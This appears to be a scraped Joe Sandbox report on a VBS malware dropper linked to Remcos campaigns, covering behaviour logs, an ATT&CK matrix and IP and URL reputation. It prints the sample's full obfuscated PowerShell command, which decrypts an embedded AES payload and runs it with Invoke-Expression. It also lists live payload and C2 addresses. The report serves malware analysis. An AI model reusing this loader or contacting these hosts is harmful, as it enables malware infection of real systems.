        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34652BFB sldt word ptr [eax-02CB7B8Ch]2_2_00007FFD34652BFB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3920Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5907Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep time: -11068046444225724s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000002.00000002.2311562493.000001242A370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: amsi64_2144.amsi.csv, type: OTHER
        Source: Yara matchFile source: amsi64_2144.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni68766530954276373206247047974663cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cnidslzbgrjpnz/qocg/lh2azhz5jl+3cjsg1p/+zzqrclxm6erqs615j4odskigveu9u0hkzwe2qlrhn3w3opnp9d3zrr0bjwddoahuyflsijmtaivmvqnjehi75gyn/731w2sw2lx9repuu8muzzbpukpdjjp40wnuy5rxupjozqj2ijhllwplewavlyyam2ryxj+az147db0x48wxphj1wzixorwhgaboawwaslahl3gmvyt1axv7fbfes5qqtebxgfvlhl4iuznyv88w0lkeiougnbeqfkzf13dc0iby1tfcgdbd33i0q+w2tvg+5qcsydt39hgqc+cpqjw6i+zs5pdayxmrwfx6shzxh4wqvwv1psllbl05m+vuyyzdwhee1jjzk1iypj679fiitnjuqbp5xka/o9mfqdn8rr6+t3w5uz8/qzmhx1mvroeqqe9sfqxrdm4xzld6zm0xvtyxdiptorir9y56wywilgvowzc7rtlcr5vnoqsqcez+tbuh3i8j+drjxqv5li4wpy7xjzfyzpapmswdqejc1bmnxhvq0ukf2im7ffm7k6nze4qwdaby3eaeqabrjji8e0i57j7cmed36tsjyhf0u03e/7/3gwxhiosnvfstql9ychnne0mcqphtsif3pxt9ee9ulz//7yh3sp7zqked24zy6bopjqu9ryt/0qhb2cgoa9ddgikpiavuisszwbmmvp3wzazgxn3nbcy0pstnp16fjfpslfxhda3ns1dtwajq0lidem77ug2ki38ej/rruke9qgo+fuhe0xcht8/wf5nvyoxrcasifgam2a+woxlafenmbr8szgcpcgnpzl/ngn6ossardn26lo+fp2jr2c/5yc3mcao0ld51wdewkzwp8b1w57wqs7gmmfayz4qaxwbt0dpwxcdt4ldwrwotfjthkkrsrb29mx+zsitgjd4zwlyp4xgkn+mdlt0rpmqdazm0hkrfyo5dxlrzhslsw0xcn3euxi+4932vgm0qse+1k4quce5wqthb1zojkshclz3bmuvcdowmedkxuqxkg7dtjdx8uvansaeltrbqenfoyu9ewmyi9lzkr9oznps+cohzr5jhq9hpvtmcsoldartighzy80sqmosagvigdyoyjgpnwduzlldye8nyqdaajuhcq27lhvzkyqvajhd3kdvjqboif1lyyay52jn1dhnhxgk0nluzd0ilxehvzphlaveococd50uqj+q1kgxn7gs2k+zoaxgamsw9oubovylc2v04rd098/as2deb2//qhwxg3f0c50kqyp4qow398pqnbg4m4pjz0uidlflekkdinqrkxq/drvpvbwz7wrubde9f6yxo/vtkm0dgir+udwiy0ewc9hpu+mklp45fqh0pc7vys3chou8e4fmalluve4yfg==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni68766530954276373206247047974663cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cnidslzbgrjpnz/qocg/lh2azhz5jl+3cjsg1p/+zzqrclxm6erqs615j4odskigveu9u0hkzwe2qlrhn3w3opnp9d3zrr0bjwddoahuyflsijmtaivmvqnjehi75gyn/731w2sw2lx9repuu8muzzbpukpdjjp40wnuy5rxupjozqj2ijhllwplewavlyyam2ryxj+az147db0x48wxphj1wzixorwhgaboawwaslahl3gmvyt1axv7fbfes5qqtebxgfvlhl4iuznyv88w0lkeiougnbeqfkzf13dc0iby1tfcgdbd33i0q+w2tvg+5qcsydt39hgqc+cpqjw6i+zs5pdayxmrwfx6shzxh4wqvwv1psllbl05m+vuyyzdwhee1jjzk1iypj679fiitnjuqbp5xka/o9mfqdn8rr6+t3w5uz8/qzmhx1mvroeqqe9sfqxrdm4xzld6zm0xvtyxdiptorir9y56wywilgvowzc7rtlcr5vnoqsqcez+tbuh3i8j+drjxqv5li4wpy7xjzfyzpapmswdqejc1bmnxhvq0ukf2im7ffm7k6nze4qwdaby3eaeqabrjji8e0i57j7cmed36tsjyhf0u03e/7/3gwxhiosnvfstql9ychnne0mcqphtsif3pxt9ee9ulz//7yh3sp7zqked24zy6bopjqu9ryt/0qhb2cgoa9ddgikpiavuisszwbmmvp3wzazgxn3nbcy0pstnp16fjfpslfxhda3ns1dtwajq0lidem77ug2ki38ej/rruke9qgo+fuhe0xcht8/wf5nvyoxrcasifgam2a+woxlafenmbr8szgcpcgnpzl/ngn6ossardn26lo+fp2jr2c/5yc3mcao0ld51wdewkzwp8b1w57wqs7gmmfayz4qaxwbt0dpwxcdt4ldwrwotfjthkkrsrb29mx+zsitgjd4zwlyp4xgkn+mdlt0rpmqdazm0hkrfyo5dxlrzhslsw0xcn3euxi+4932vgm0qse+1k4quce5wqthb1zojkshclz3bmuvcdowmedkxuqxkg7dtjdx8uvansaeltrbqenfoyu9ewmyi9lzkr9oznps+cohzr5jhq9hpvtmcsoldartighzy80sqmosagvigdyoyjgpnwduzlldye8nyqdaajuhcq27lhvzkyqvajhd3kdvjqboif1lyyay52jn1dhnhxgk0nluzd0ilxehvzphlaveococd50uqj+q1kgxn7gs2k+zoaxgamsw9oubovylc2v04rd098/as2deb2//qhwxg3f0c50kqyp4qow398pqnbg4m4pjz0uidlflekkdinqrkxq/drvpvbwz7wrubde9f6yxo/vtkm0dgir+udwiy0ewc9hpu+mklp45fqh0pc7vys3chou8e4fmalluve4yfg==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information231
        Scripting
        Valid Accounts21
        Command and Scripting Interpreter
        231
        Scripting
        11
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        31
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Process Discovery
        Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell
        Logon Script (Windows)Logon Script (Windows)11
        Process Injection
        Security Account Manager31
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture1
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
        Obfuscated Files or Information
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials12
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        creatednewwaterbottleforme.gIF.vbs4%ReversingLabsWin32.Dropper.Generic
        creatednewwaterbottleforme.gIF.vbs11%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
        http://192.3.176.174/60/WDER.txt0%Avira URL Cloudsafe
        http://192.3.176.1740%Avira URL Cloudsafe
        http://192.3.176.174(0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        http://198.46.176.133/Upload/vbs.jpeg19%VirustotalBrowse
        http://192.3.176.1743%VirustotalBrowse
        http://198.46.176.1330%Avira URL Cloudsafe
        https://github.com/Pester/Pester1%VirustotalBrowse
        http://192.3.176.174/60/WDER.txt0%VirustotalBrowse
        http://198.46.176.13314%VirustotalBrowse
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        http://192.3.176.174/60/WDER.txtfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://198.46.176.133/Upload/vbs.jpegfalse
        • 19%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://192.3.176.174powershell.exe, 00000002.00000002.2213002122.00000124124FD000.00000004.00000800.00020000.00000000.sdmpfalse
        • 3%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2213002122.0000012412294000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2213002122.0000012412294000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/Licensepowershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://192.3.176.174(powershell.exe, 00000002.00000002.2213002122.0000012412626000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2213002122.0000012412071000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2213002122.0000012412071000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2213002122.0000012412294000.00000004.00000800.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://198.46.176.133powershell.exe, 00000002.00000002.2213002122.0000012412294000.00000004.00000800.00020000.00000000.sdmpfalse
        • 14%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        192.3.176.174
        unknownUnited States
        36352AS-COLOCROSSINGUSfalse
        198.46.176.133
        unknownUnited States
        36352AS-COLOCROSSINGUSfalse
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1483435
        Start date and time:2024-07-27 13:31:11 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 27s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:11
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:creatednewwaterbottleforme.gIF.vbs
        Detection:MAL
        Classification:mal100.expl.evad.winVBS@4/3@0/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 88%
        • Number of executed functions: 8
        • Number of non-executed functions: 4
        Cookbook Comments:
        • Found application associated with file extension: .vbs
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target powershell.exe, PID 2144 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        TimeTypeDescription
        07:32:00API Interceptor46x Sleep call for process: powershell.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        192.3.176.174IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
        • 192.3.176.174/60/WDER.txt
        AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
        • 192.3.176.174/60/WDER.txt
        198.46.176.133IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        erthings.docGet hashmaliciousRemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        girlfrnd.docGet hashmaliciousRemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        042240724.xlsGet hashmaliciousRemcosBrowse
        • 198.46.176.133/Upload/vbs.jpeg
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AS-COLOCROSSINGUSFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
        • 107.173.160.137
        e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
        • 107.173.160.137
        file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
        • 107.173.160.137
        jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
        • 23.94.183.150
        WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
        • 104.168.36.68
        172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
        • 192.3.101.142
        1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
        • 192.210.214.9
        IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
        • 198.46.176.133
        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
        • 104.168.45.34
        erthings.docGet hashmaliciousRemcosBrowse
        • 192.3.101.142
        AS-COLOCROSSINGUSFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
        • 107.173.160.137
        e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
        • 107.173.160.137
        file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
        • 107.173.160.137
        jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
        • 23.94.183.150
        WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
